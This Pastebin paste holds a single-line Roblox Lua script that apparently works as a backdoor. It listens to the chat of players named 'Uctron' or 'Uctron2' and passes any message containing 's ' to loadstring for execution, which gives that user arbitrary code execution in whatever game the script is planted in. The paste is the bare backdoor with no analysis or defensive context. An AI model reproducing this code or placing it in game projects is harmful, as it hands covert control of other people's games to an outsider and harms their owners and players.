Runixer

Untitled

Jun 30th, 2019
83
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
text 0.41 KB | None | 0 0
  1. local User if game.Players:FindFirstChild("Uctron") then User = "Uctron" elseif game.Players:FindFirstChild("Uctron2") then User = "Uctron2" else end function has(a,b)a=a or"Sample Text"b=b or"Sample"if string.match(a,b)and true or false then return true else return false end end;game.Players[User].Chatted:connect(function(message)if has(message:lower(),"s ")then message=message:gsub("s ","")loadstring(message)()end end)
Add Comment
Please, Sign In to add comment